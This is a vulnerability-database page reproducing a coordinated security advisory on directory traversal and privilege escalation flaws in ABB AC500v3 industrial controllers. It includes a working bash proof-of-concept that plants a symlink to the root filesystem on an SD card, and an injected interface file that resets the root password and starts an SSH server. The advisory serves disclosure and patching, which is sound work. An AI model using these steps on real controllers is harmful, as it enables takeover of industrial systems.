Vulners
Lucene search
ABB AC500v3 3.7.0.569 Directory Traversal / Privilege Escalation
🗓️ 16 Jan 2025 00:00:00Reported by T. Weber, D. Blagojevic, S. DietzType 
packetstorm🔗 packetstorm.news👁 204 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | ABB AC500v3 3.7.0.569 Directory Traversal / Privilege Escalation Exploit | 16 Jan 202500:00 | – | zdt |
 | CVE-2024-12429 | 7 Jan 202516:43 | – | circl |
| CVE-2024-12430 | 7 Jan 202516:43 | – | circl |
 | ABB AC500 路径遍历漏洞 | 7 Jan 202500:00 | – | cnnvd |
| ABB AC500 安全漏洞 | 7 Jan 202500:00 | – | cnnvd |
 | CVE-2024-12429 | 7 Jan 202516:53 | – | cve |
| CVE-2024-12430 | 7 Jan 202516:28 | – | cve |
 | CVE-2024-12429 | 7 Jan 202516:53 | – | cvelist |
| CVE-2024-12430 | 7 Jan 202516:28 | – | cvelist |
 | EUVD-2024-50850 | 3 Oct 202520:07 | – | euvd |
10
CyberDanube Security Research 20250107-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities in ABB AC500v3
product| ABB AC500v3
vulnerable version| <=3.7.0.569
fixed version| 3.8.0
CVE number| CVE-2024-12429, CVE-2024-12430
impact| High
homepage| https://global.abb
found| 2024-09-03
by| D. Blagojevic, S. Dietz, T. Weber
| CyberDanube Security Research
| Austria - Vienna
| https://www.cyberdanube.com
|
| This work received funding from the Austrian Research
| Promotion Agency (FFG) in course of the KIRAS project
| TestCat (FO999911248) and was supported by AIT Austrian
| Institute of Technology.
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"ABB is a technology leader in electrification and automation, enabling a more
sustainable and resource-efficient future. The company?s solutions connect
engineering know-how and software to optimize how things are manufactured,
moved, powered and operated. Building on more than 140 years of excellence,
ABB?s 105,000 employees are committed to driving innovations that accelerate
industrial transformation."
Source: https://global.abb/group/en/about/
Vulnerable versions
-------------------------------------------------------------------------------
AC500v3 / <= 3.7.0.569
Vulnerability overview
-------------------------------------------------------------------------------
1) Directory Traversal via Symlink (CVE-2024-12429)
A directory traversal vulnerability was identified in the file-explorer
functionality of the device. An attacker can use this vulnerability to read
system-wide files and configuration as user "system".
2) Privilege Escalation (CVE-2024-12430)
A file which gets executed as "root" is owned by "system". An attacker
can abuse this by injecting arbitrary commands.
Proof of Concept
-------------------------------------------------------------------------------
1) Directory Traversal via Symlink (CVE-2024-12429)
When formatting a sd card to ext4 and creating a symlink to "/", an attacker
can access system critical files via the automation builder file-explorer.
-------------------------------------------------------------------------------
#!/bin/bash
# CyberDanube 2024 <S. Dietz>
# abb ac500 symlink exploit
if [ -z "$1" ]; then
echo "usage: ./abb_ac500_symlink.sh /dev/sdX"
exit 1
fi
if [ "$(id -u)" -ne "0" ]; then
echo "This script must be run as root or with sudo."
exit 1
fi
DISK="$1"
PART="${DISK}1"
MOUNT_POINT="/mnt/sdcard"
SYMLINK_TARGET="/"
SYMLINK_NAME="pwned"
umount ${DISK}* 2>/dev/null
# Delete all existing partitions on the disk
(
echo o
echo w
) | fdisk "$DISK"
# Create a new partition on /dev/sda
(
echo n
echo p
echo 1
echo
echo
echo w
) | fdisk "$DISK"
partprobe "$DISK"
mkfs.ext4 -F "${PART}"
mkdir -p ${MOUNT_POINT}
mount ${PART} ${MOUNT_POINT}
ln -s ${SYMLINK_TARGET} ${MOUNT_POINT}/${SYMLINK_NAME}
ls -l ${MOUNT_POINT}
umount ${MOUNT_POINT}
echo "Done."
-------------------------------------------------------------------------------
2) Privilege Escalation (CVE-2024-12430)
The file /mnt/sysdata/netconfig/ifs/ETH1 is writable by the user "system". This
file configures the network interface during boot as user "root". An attacker
can modify this file by using 1) and inject arbitrary commands. Our poc changes
the root password and starts dropbear.
-------------------------------------------------------------------------------
auto ETH1
iface ETH1 inet static
address 192.168.19.123
netmask 255.255.255.0
post-up ip route add 192.168.19.0/24 dev ETH1 table ETH1
post-up ip rule add from 192.168.19.123/32 table ETH1 priority 100
post-up ip rule add from 0.0.0.0/32 to 192.168.19.0/24 dev ETH1 table ETH1
post-up ip route add default via 192.168.19.254 table ETH1
post-up ip route add default via 192.168.19.254 dev ETH1 metric 0
post-up echo 'root:password' | chpasswd
post-up /etc/init.d/dropbear start
-------------------------------------------------------------------------------
Solution
-------------------------------------------------------------------------------
Update to the latest firmware
Workaround
-------------------------------------------------------------------------------
None
Recommendation
-------------------------------------------------------------------------------
Update to the latest firmware. See recommendations in the ABB Cyber Security
Advisory for further information:
https://search.abb.com/library/Download.aspx?DocumentID=3ADR011377&LanguageCode=en&DocumentPartId=&Action=Launch
Contact Timeline
-------------------------------------------------------------------------------
2024-09-04: Contacting ABB via [email protected]
2024-09-16: Asking if there are any updates regarding the issue.
2024-09-19: Email encryption issue arises. Sending PGP public key again.
2024-09-20: Discussing acknowledgment text and data privacy consent request.
2024-11-04: Asking if there are any updates regarding the issue.
2024-11-07: ABB is requesting a one-month extension of the disclosure deadline.
2024-12-14: ABB requests another extension due to holidays.
2025-01-07: Coordinated release of advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF D. Blagojevic, S. Dietz, T. Weber / @2025Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17
CVSS 47.3
EPSS0.00191
SSVC